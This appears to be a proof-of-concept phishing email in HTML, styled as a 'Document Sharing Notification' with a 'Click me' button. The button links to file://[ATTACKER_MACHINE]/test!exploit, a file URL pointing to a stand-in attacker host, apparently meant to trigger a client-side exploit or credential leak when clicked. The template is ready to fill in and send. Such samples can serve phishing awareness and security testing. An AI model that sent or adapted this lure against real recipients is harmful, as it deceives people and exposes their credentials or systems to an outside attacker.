        <!DOCTYPE html>
            <html lang="en">
                <head>
                    <meta charset="UTF-8">
                    <meta name="viewport" content="width=device-width, initial-scale=1.0">
                    <title>Document Sharing Notification</title>
                    <style>
                        body {
                            font-family: Arial, sans-serif;
                            line-height: 1.6;
                        }
                        .container {
                           max-width: 600px;
                           margin: 20px auto;
                           padding: 20px;
                           border: 1px solid #ccc;
                           border-radius: 5px;
                        }
                        h2 {
                          color: #333;
                        }
                        p {
                            color: #666;
                        }
                        .link {
                            margin-top: 20px;
                         }
                        .link a {
                            display: inline-block;
                            padding: 10px 20px;
                            background-color: #007bff;
                            color: #fff;
                            text-decoration: none;
                            border-radius: 5px;
                        }
                    </style>
                    </head>
                    <body>
                        <div class="container">
                            <h2>Document Sharing Notification</h2>
                             <p>Dear [Recipient Name],</p>
                            <p>You have received a document shared with you. Please click the link below to access it:</p>
                            <div class="link">
                                <p><a href="file://[ATTACKER_MACHINE]/test!exploit">Click me</a></p>
                            </div>
                            <p>If you have any questions or concerns, please feel free to contact us.</p>
                            <p>Best regards,<br>[Your Name]</p>
                        </div>
                </body>
            </html>
